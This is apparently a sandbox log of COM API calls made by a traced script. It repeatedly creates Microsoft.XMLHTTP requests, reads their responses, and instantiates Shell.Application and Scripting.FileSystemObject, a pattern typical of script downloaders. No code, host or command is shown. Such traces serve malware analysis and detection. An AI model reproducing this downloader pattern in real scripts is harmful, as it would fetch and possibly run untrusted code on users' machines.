	[0245.184] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0245.184] SysStringLen (param_1=0x0) returned 0x0
	[0245.184] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0245.184] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0245.185] ??2@YAPEAX_K@Z () returned 0x62f330
	[0245.185] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0245.185] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0245.185] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.185] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.185] longjmp () 
	[0245.185] longjmp () 
	[0245.185] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0245.185] SysStringLen (param_1=0x0) returned 0x0
	[0245.185] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0245.185] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0245.185] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0245.185] ??2@YAPEAX_K@Z () returned 0x62f310
	[0245.185] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0245.185] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0245.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0245.186] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0245.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0245.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0245.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0245.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0245.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0245.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0245.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0245.782] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0245.782] SysStringLen (param_1=0x0) returned 0x0
	[0245.782] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0245.782] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0245.782] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0245.782] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0245.782] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0245.782] ??2@YAPEAX_K@Z () returned 0x62f350
	[0245.782] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0245.782] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0245.782] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0245.782] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0245.782] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0245.782] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0245.782] SysStringLen (param_1=0x0) returned 0x0
	[0245.783] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0245.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0245.785] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0245.785] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0245.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0245.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0245.785] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0246.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0246.211] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0246.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0246.215] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0246.215] SysStringLen (param_1=0x0) returned 0x0
	[0246.215] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0246.215] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0246.215] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0246.215] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0246.215] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0246.215] ??2@YAPEAX_K@Z () returned 0x62f310
	[0246.215] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f310) 
	[0246.215] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0246.215] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0246.215] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0246.215] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0246.215] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.215] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0246.219] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0246.219] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0246.219] SysStringLen (param_1=0x0) returned 0x0
	[0246.219] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0246.219] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0246.219] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0246.219] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0246.219] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0246.219] ??2@YAPEAX_K@Z () returned 0x62f330
	[0246.219] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0246.219] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0246.219] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0246.219] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0246.219] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0246.219] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0246.220] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0246.220] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
